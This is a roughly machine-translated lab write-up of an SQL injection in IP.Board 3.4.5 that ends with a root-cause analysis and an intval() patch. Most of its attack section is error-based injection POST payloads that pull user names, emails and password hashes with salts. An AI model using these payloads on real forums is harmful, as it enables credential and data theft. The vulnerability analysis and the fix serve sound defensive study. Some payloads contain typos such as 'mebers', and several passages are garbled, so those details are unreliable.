Use and Analysis of SQL injection vulnerability in IP. Board 3.4.5

Use and Analysis of SQL injection vulnerability in IP. Board 3.4.5

I. background information
 

First, let's briefly introduce the background information of this web program and some basic information about this vulnerability:

IPB is called the Invision Power Board (IPB or IP. is one of the world's most famous Forum programs, built on the PHP + MySQL architecture. the X version is free of charge, from 2. X starts charging. Many major organizations are their users, such as NASA and AMD.

In this system, the interface/ipsconnect/ipconnect. php page does not properly process the id parameter, resulting in an SQL error on the website. This vulnerability will write error messages to/cache/SQL _error_latest.cgi. Through continuous interaction with this file, you can obtain sensitive information. PoC code for this vulnerability has appeared on the Internet, written in python, link: http://seclists.org/fulldisclosure/2014/Nov/20

When using this code, you may need to modify the target IP address in the source code.

IP addresses can be found on Chinese websites. board Version 3.4.5, which meets the vulnerability conditions, I set up an IP address in the WAMP environment. in the experiment environment, set the user name to navyofficer, password to navyofficer, mailbox to navyofficer@china.com, and the system only has this user.

II. Specific Attack Process

1. Obtain the number of users in the system

The attacker sends the following

POST request

act=login&idType=id&id[]=-1&id[]=-1)and 1!="'" and extractvalue(1,concat(0x3a,(SELECTCOUNT(*) FROM members)))#'

Used to obtain the number of users in the system.

Then access SQL _error_latest.cgi. The system returns the following content and obtains the number of users in the system in the error message.

We can see that there is a user in the system.
 

2. Obtain the user ID

Attackers send the following POST requests.

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(SELECT member_id FROM mebers LIMIT 0,1)))#'

Used to obtain the user ID

Then access SQL _error_latest.cgi. The system returns the following content and obtains the user ID in the system in the error message.

The User ID is 1.

3. Get the user name

Attackers send the following POST requests.

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(SELECT name FROM mebers LIMIT 0,1)))#'

 

Used to obtain the user name

 

Then access SQL _error_latest.cgi. The system returns the following content and obtains the name of the user in the system in the error message.

The user name is navyofficer.

4. Get the user's email address

Attackers send the following POST requests.

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(SELECT email FROM mebers LIMIT 0,1)))#

Used to obtain the user's mailbox

Then access SQL _error_latest.cgi. The system returns the following content and obtains the email address of the user in the system in the error message.

 

We can see that the user's mailbox is navyofficer@china.com

5. Obtain the user's password HASH

Attackers send the following POST requests.

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(SUBSTRING((SELECT CONCAT(members_pass_hash, 0x3a, members_pass_salt) FROM members LIMIT 0,1), 1, 31)))#'

And

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(SUBSTRING((SELECT CONCAT(members_pass_hash, 0x3a, members_pass_salt) FROM members LIMIT 0,1), 32, 31)))#'

Used to obtain the user's password HASH

Then access SQL _error_latest.cgi, and the system returns the following content. In the error message, obtain the password HASH of the user in the system.

This step is divided into two steps. In fact, the previous steps determine the length of the result before obtaining sensitive information. If the length is greater than 31, multiple steps are performed, for example, the following POST will be sent before obtaining the name:

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(LENGTH((SELECT name FROM members LIMIT 0,1)))))#'

Because the returned result is less than 31, you can directly query it.

The following POST request is sent first when the user password HASH is obtained:

act=login&idType=id&id[]=-1&id[]=-1) and 1!="'" and extractvalue(1,concat(0x3a,(LENGTH((SELECT CONCAT(members_pass_hash, 0x3a, members_pass_salt) FROM members LIMIT 0,1)))))#'

 

The returned result indicates that the password HASH length is 38 and greater than 31. Therefore, the process of obtaining sensitive information is divided into two steps.

In the returned results, you need to connect the two results.

Iii. Attack Effects

Run attack code

The attack code exposes the number of users, user names, user mailboxes, and user password HASH in the system. The analysis results are exactly the same as those of the preceding data packets. Therefore, the attack is successful.

Iv. Vulnerability resolution

First, two important code snippets are pasted:

 

Figure 1:

 

Figure 2:

The following statement exists in line 772nd of interface/ipsconnect/ipconnect. php:

call_user_func_array( array( $ipsConnect, $_REQUEST['act'] ), $params );

When an attack occurs, $ _ REQUEST ['ac'] obtains the value from the URL and the result is assignedLogin. $ Params corresponding to the login method is

'login' => array( 'idType', 'id', 'password', 'key', 'redirect', 'redirectHash' )

This is an array parameter and will be passed to [ipsConnect]. login. Then this function is called. The prototype of this function is

public function login( $identifier, $identifierValue, $md5Password, $key, $redirect, $redirectHash )

 

The function contains the following code in line 100th of interface/ipsconnect/ipconnect. php:

$member = IPSMember::load($identifierValue, 'none', $identifier );

The value of id is passed to the variable $ identifierValue. Therefore, no type check is performed for the passed variables. Therefore, the vulnerability exists.

Reinforce the corresponding statement, that is, add the intval () function to forcibly convert the $ identifierValue variable to the integer type. The details are as follows:

$member = IPSMember::load(intval($identifierValue), 'none', $identifier );

When you run the Attack Script again, you will find that the Attack Script is running incorrectly and cannot continue to exploit this vulnerability.

We can see that our repair was successful.

5. Repair suggestions

 

The vulnerability was revealed on July 15, November 9, 2014, and the next day, that is, July 15, November 10. The vendor Invision Power Services provided the corresponding patch. You can manually download the patch for remediation.

 

Vi. Summary

This article explains in detail an experiment. It builds a target environment, runs attack scripts, analyzes data packets generated during the attack process, and analyzes problematic WEB programs, I feel that building an environment and experimenting with it is very helpful for the development of technology.